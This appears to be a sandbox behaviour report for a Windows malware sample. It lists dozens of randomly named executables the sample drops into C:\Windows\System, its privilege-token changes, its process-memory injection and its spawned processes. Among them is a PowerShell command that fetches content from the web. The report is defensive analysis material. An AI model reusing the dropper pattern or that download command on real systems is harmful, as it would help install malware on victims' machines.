File created C:\Windows\System\mHsmrOI.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GVlVGpK.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\izRVCkU.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\inzBNJg.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zUoDXFc.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\odrsPPH.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hbPKtEc.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZAexEUu.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\sVhToqU.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EFIuFMw.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rywWFwe.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FvgrBTA.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\tXXgvVP.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IFVTXqa.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\OpKqana.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XjZmTQq.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SvqVFYT.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\alnrIHq.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zGFBOqV.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lbOBuBh.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HDwDQui.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vYhDZVh.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pehNVPb.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ABOjxrQ.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\LDXzOwV.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ieRVlLT.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ovdMgFn.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\oSiYlzJ.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\DULweDD.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AzlYxYr.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\eRcsRgR.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\VudxPFj.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\LnFfRwi.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QeqbPHc.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rHWoBgF.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\OsvepMg.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\LoTVHUW.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TTVXSiD.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3140 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3140 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3140 wrote to memory of 4516 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\nrEeUQv.exe
PID 3140 wrote to memory of 4516 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\nrEeUQv.exe
PID 3140 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\RdaFAwN.exe
PID 3140 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\RdaFAwN.exe
PID 3140 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\aGbHgSz.exe
PID 3140 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\aGbHgSz.exe
PID 3140 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\BtvhkRv.exe
PID 3140 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\BtvhkRv.exe
PID 3140 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\wBxbKjx.exe
PID 3140 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\wBxbKjx.exe
PID 3140 wrote to memory of 1152 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\sVSUdhc.exe
PID 3140 wrote to memory of 1152 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\sVSUdhc.exe
PID 3140 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\nhbEhwf.exe
PID 3140 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\nhbEhwf.exe
PID 3140 wrote to memory of 3308 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\NkwjlPj.exe
PID 3140 wrote to memory of 3308 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\NkwjlPj.exe
PID 3140 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\VudxPFj.exe
PID 3140 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\VudxPFj.exe
PID 3140 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\JPEdnWE.exe
PID 3140 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\JPEdnWE.exe
PID 3140 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\HBcNeCF.exe
PID 3140 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\HBcNeCF.exe
PID 3140 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\ZBtsyTp.exe
PID 3140 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\ZBtsyTp.exe
PID 3140 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\oVLeUIc.exe
PID 3140 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\oVLeUIc.exe
PID 3140 wrote to memory of 3472 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\SNJvcnq.exe
PID 3140 wrote to memory of 3472 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\SNJvcnq.exe
PID 3140 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\CQfDRZQ.exe
PID 3140 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\CQfDRZQ.exe
PID 3140 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\eBOBADi.exe
PID 3140 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\eBOBADi.exe
PID 3140 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\QgqHTam.exe
PID 3140 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\QgqHTam.exe
PID 3140 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\NjPVgJQ.exe
PID 3140 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\NjPVgJQ.exe
PID 3140 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\eXrHiiL.exe
PID 3140 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\eXrHiiL.exe
PID 3140 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\JlpOeei.exe
PID 3140 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\JlpOeei.exe
PID 3140 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\ANSxhHm.exe
PID 3140 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\ANSxhHm.exe
PID 3140 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\DYNggOH.exe
PID 3140 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\DYNggOH.exe
PID 3140 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\keyCkDc.exe
PID 3140 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\keyCkDc.exe
PID 3140 wrote to memory of 3176 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\ZzbheAr.exe
PID 3140 wrote to memory of 3176 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\ZzbheAr.exe
PID 3140 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\oppyROm.exe
PID 3140 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\oppyROm.exe
PID 3140 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\sVhToqU.exe
PID 3140 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\sVhToqU.exe
PID 3140 wrote to memory of 1124 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\NKNFxih.exe
PID 3140 wrote to memory of 1124 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\NKNFxih.exe
PID 3140 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\IiGRZwU.exe
PID 3140 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\IiGRZwU.exe
PID 3140 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\rfcuMDg.exe
PID 3140 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\rfcuMDg.exe
PID 3140 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\JusZzIE.exe
PID 3140 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\JusZzIE.exe
PID 3140 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\aYSpnqN.exe
PID 3140 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\aYSpnqN.exe

Processes

C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\nrEeUQv.exe

C:\Windows\System\nrEeUQv.exe

C:\Windows\System\RdaFAwN.exe

C:\Windows\System\RdaFAwN.exe

C:\Windows\System\aGbHgSz.exe

C:\Windows\System\aGbHgSz.exe

C:\Windows\System\BtvhkRv.exe

C:\Windows\System\BtvhkRv.exe

C:\Windows\System\wBxbKjx.exe

C:\Windows\System\wBxbKjx.exe

C:\Windows\System\sVSUdhc.exe

C:\Windows\System\sVSUdhc.exe

C:\Windows\System\nhbEhwf.exe

C:\Windows\System\nhbEhwf.exe

C:\Windows\System\NkwjlPj.exe

C:\Windows\System\NkwjlPj.exe

C:\Windows\System\VudxPFj.exe

C:\Windows\System\VudxPFj.exe

C:\Windows\System\JPEdnWE.exe

C:\Windows\System\JPEdnWE.exe

C:\Windows\System\HBcNeCF.exe

C:\Windows\System\HBcNeCF.exe

C:\Windows\System\ZBtsyTp.exe

C:\Windows\System\ZBtsyTp.exe

C:\Windows\System\oVLeUIc.exe

C:\Windows\System\oVLeUIc.exe

C:\Windows\System\SNJvcnq.exe

C:\Windows\System\SNJvcnq.exe

C:\Windows\System\CQfDRZQ.exe

C:\Windows\System\CQfDRZQ.exe

C:\Windows\System\eBOBADi.exe

C:\Windows\System\eBOBADi.exe

C:\Windows\System\QgqHTam.exe

C:\Windows\System\QgqHTam.exe

C:\Windows\System\NjPVgJQ.exe

C:\Windows\System\NjPVgJQ.exe

C:\Windows\System\eXrHiiL.exe

C:\Windows\System\eXrHiiL.exe

C:\Windows\System\JlpOeei.exe

C:\Windows\System\JlpOeei.exe

C:\Windows\System\ANSxhHm.exe

C:\Windows\System\ANSxhHm.exe

C:\Windows\System\DYNggOH.exe

C:\Windows\System\DYNggOH.exe

C:\Windows\System\keyCkDc.exe

C:\Windows\System\keyCkDc.exe

C:\Windows\System\ZzbheAr.exe

C:\Windows\System\ZzbheAr.exe

C:\Windows\System\oppyROm.exe

C:\Windows\System\oppyROm.exe

C:\Windows\System\sVhToqU.exe

C:\Windows\System\sVhToqU.exe

C:\Windows\System\NKNFxih.exe

C:\Windows\System\NKNFxih.exe

C:\Windows\System\IiGRZwU.exe

C:\Windows\System\IiGRZwU.exe

C:\Windows\System\rfcuMDg.exe

C:\Windows\System\rfcuMDg.exe

C:\Windows\System\JusZzIE.exe

C:\Windows\System\JusZzIE.exe

C:\Windows\System\aYSpnqN.exe

C:\Windows\System\aYSpnqN.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3804,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=4072 /prefetch:8

C:\Windows\System\LstzCdJ.exe

C:\Windows\System\LstzCdJ.exe

C:\Windows\System\wInVkvP.exe

C:\Windows\System\wInVkvP.exe

C:\Windows\System\QZPkwWt.exe

C:\Windows\System\QZPkwWt.exe

C:\Windows\System\jzqtAgN.exe

C:\Windows\System\jzqtAgN.exe

C:\Windows\System\jPMbBSH.exe

C:\Windows\System\jPMbBSH.exe

C:\Windows\System\cOYRRog.exe

C:\Windows\System\cOYRRog.exe

C:\Windows\System\JidTZOw.exe

C:\Windows\System\JidTZOw.exe

C:\Windows\System\vSGYRre.exe

C:\Windows\System\vSGYRre.exe

C:\Windows\System\pjyqlML.exe

C:\Windows\System\pjyqlML.exe

C:\Windows\System\xxEVweB.exe

C:\Windows\System\xxEVweB.exe

C:\Windows\System\xxuRYkD.exe

C:\Windows\System\xxuRYkD.exe

C:\Windows\System\GJssihl.exe

C:\Windows\System\GJssihl.exe

C:\Windows\System\fRJbBru.exe

C:\Windows\System\fRJbBru.exe

C:\Windows\System\dnNqmzc.exe

C:\Windows\System\dnNqmzc.exe

C:\Windows\System\uFDxQAb.exe

C:\Windows\System\uFDxQAb.exe

C:\Windows\System\MJYhgEE.exe

C:\Windows\System\MJYhgEE.exe

C:\Windows\System\nImqGuw.exe

C:\Windows\System\nImqGuw.exe

C:\Windows\System\LyLmRkE.exe

C:\Windows\System\LyLmRkE.exe

C:\Windows\System\fKmQEFc.exe

C:\Windows\System\fKmQEFc.exe

C:\Windows\System\unaKQSf.exe

C:\Windows\System\unaKQSf.exe

C:\Windows\System\mRBRGbp.exe

C:\Windows\System\mRBRGbp.exe

C:\Windows\System\CGqIbqR.exe

C:\Windows\System\CGqIbqR.exe

C:\Windows\System\iBBSGie.exe

C:\Windows\System\iBBSGie.exe

C:\Windows\System\ndrfnkz.exe

C:\Windows\System\ndrfnkz.exe

C:\Windows\System\atzsjiv.exe

C:\Windows\System\atzsjiv.exe

C:\Windows\System\ASEyKjN.exe

C:\Windows\System\ASEyKjN.exe

C:\Windows\System\ZmxkzWp.exe

C:\Windows\System\ZmxkzWp.exe

C:\Windows\System\UhqYZTH.exe

C:\Windows\System\UhqYZTH.exe

C:\Windows\System\abqYkIa.exe

C:\Windows\System\abqYkIa.exe

C:\Windows\System\dEFRjnQ.exe

C:\Windows\System\dEFRjnQ.exe

C:\Windows\System\zGFBOqV.exe

C:\Windows\System\zGFBOqV.exe

C:\Windows\System\eeUHsoz.exe

C:\Windows\System\eeUHsoz.exe

C:\Windows\System\aUfVASW.exe

C:\Windows\System\aUfVASW.exe

C:\Windows\System\qTbUtyJ.exe

C:\Windows\System\qTbUtyJ.exe

C:\Windows\System\UYyUaRm.exe

C:\Windows\System\UYyUaRm.exe

C:\Windows\System\lOHQHZd.exe

C:\Windows\System\lOHQHZd.exe

C:\Windows\System\LpqdDWp.exe

C:\Windows\System\LpqdDWp.exe

C:\Windows\System\kCgyUjk.exe

C:\Windows\System\kCgyUjk.exe

C:\Windows\System\nYYmWOi.exe

C:\Windows\System\nYYmWOi.exe

C:\Windows\System\kYQydlD.exe

C:\Windows\System\kYQydlD.exe

C:\Windows\System\CWEvKCR.exe

C:\Windows\System\CWEvKCR.exe

C:\Windows\System\zlFZKUj.exe

C:\Windows\System\zlFZKUj.exe

C:\Windows\System\Tvdvwbz.exe

C:\Windows\System\Tvdvwbz.exe

C:\Windows\System\NzGPJWq.exe

C:\Windows\System\NzGPJWq.exe

C:\Windows\System\yFYFLSR.exe

C:\Windows\System\yFYFLSR.exe

C:\Windows\System\izRVCkU.exe

C:\Windows\System\izRVCkU.exe

C:\Windows\System\AFnTCoZ.exe

C:\Windows\System\AFnTCoZ.exe

C:\Windows\System\BnuVSZT.exe

C:\Windows\System\BnuVSZT.exe

C:\Windows\System\HYhYoxU.exe

C:\Windows\System\HYhYoxU.exe

C:\Windows\System\uYeGhEn.exe

C:\Windows\System\uYeGhEn.exe

C:\Windows\System\GGOtGvz.exe

C:\Windows\System\GGOtGvz.exe

C:\Windows\System\FFNUvkZ.exe

C:\Windows\System\FFNUvkZ.exe

C:\Windows\System\gLnVMxa.exe

C:\Windows\System\gLnVMxa.exe

C:\Windows\System\BASpGTu.exe

C:\Windows\System\BASpGTu.exe

C:\Windows\System\pXMTzAF.exe

C:\Windows\System\pXMTzAF.exe

C:\Windows\System\pxptPZo.exe

C:\Windows\System\pxptPZo.exe

C:\Windows\System\rOueGYf.exe

C:\Windows\System\rOueGYf.exe

C:\Windows\System\yRiNWua.exe

C:\Windows\System\yRiNWua.exe

C:\Windows\System\EZyIloq.exe

C:\Windows\System\EZyIloq.exe

C:\Windows\System\UpjplYQ.exe

C:\Windows\System\UpjplYQ.exe

C:\Windows\System\YvvoBAM.exe

C:\Windows\System\YvvoBAM.exe

C:\Windows\System\ZeabmUS.exe

C:\Windows\System\ZeabmUS.exe

C:\Windows\System\LjYQknM.exe

C:\Windows\System\LjYQknM.exe

C:\Windows\System\rHOcqJn.exe

C:\Windows\System\rHOcqJn.exe

C:\Windows\System\kPeeZWk.exe

C:\Windows\System\kPeeZWk.exe

C:\Windows\System\HuKuFkS.exe

C:\Windows\System\HuKuFkS.exe

C:\Windows\System\hyjwkfz.exe

C:\Windows\System\hyjwkfz.exe

C:\Windows\System\HtHjQnB.exe

C:\Windows\System\HtHjQnB.exe

C:\Windows\System\IxDvNly.exe

C:\Windows\System\IxDvNly.exe

C:\Windows\System\TTVXSiD.exe

C:\Windows\System\TTVXSiD.exe

C:\Windows\System\AuAFbqA.exe

C:\Windows\System\AuAFbqA.exe

C:\Windows\System\GQkblYN.exe

C:\Windows\System\GQkblYN.exe

C:\Windows\System\CkOyLab.exe

C:\Windows\System\CkOyLab.exe

C:\Windows\System\NkebJuQ.exe

C:\Windows\System\NkebJuQ.exe

C:\Windows\System\ydiycOW.exe

C:\Windows\System\ydiycOW.exe

C:\Windows\System\CUdEVWG.exe

C:\Windows\System\CUdEVWG.exe

C:\Windows\System\pMiSQCk.exe

C:\Windows\System\pMiSQCk.exe

C:\Windows\System\nbAKiyi.exe

C:\Windows\System\nbAKiyi.exe

C:\Windows\System\hNvLydW.exe

C:\Windows\System\hNvLydW.exe

C:\Windows\System\euuTeKA.exe

C:\Windows\System\euuTeKA.exe

C:\Windows\System\XcznFhf.exe

C:\Windows\System\XcznFhf.exe

C:\Windows\System\tXXgvVP.exe

C:\Windows\System\tXXgvVP.exe

C:\Windows\System\kXyltqs.exe

C:\Windows\System\kXyltqs.exe

C:\Windows\System\xQxnqLP.exe

C:\Windows\System\xQxnqLP.exe

C:\Windows\System\VtXMtQe.exe

C:\Windows\System\VtXMtQe.exe

C:\Windows\System\FruTUIl.exe

C:\Windows\System\FruTUIl.exe

C:\Windows\System\sBBRNWZ.exe

C:\Windows\System\sBBRNWZ.exe

C:\Windows\System\GMQoUeO.exe

C:\Windows\System\GMQoUeO.exe

C:\Windows\System\lCnVFlZ.exe

C:\Windows\System\lCnVFlZ.exe

C:\Windows\System\EFIuFMw.exe

C:\Windows\System\EFIuFMw.exe

C:\Windows\System\ovdMgFn.exe

C:\Windows\System\ovdMgFn.exe

C:\Windows\System\yxzPZCn.exe

C:\Windows\System\yxzPZCn.exe

C:\Windows\System\MrNlSQd.exe

C:\Windows\System\MrNlSQd.exe

C:\Windows\System\MkwbCDQ.exe

C:\Windows\System\MkwbCDQ.exe

C:\Windows\System\inzBNJg.exe

C:\Windows\System\inzBNJg.exe

C:\Windows\System\iSISjCG.exe

C:\Windows\System\iSISjCG.exe

C:\Windows\System\pPqGDFG.exe

C:\Windows\System\pPqGDFG.exe

C:\Windows\System\lbOBuBh.exe

C:\Windows\System\lbOBuBh.exe

C:\Windows\System\NvbkwgC.exe

C:\Windows\System\NvbkwgC.exe

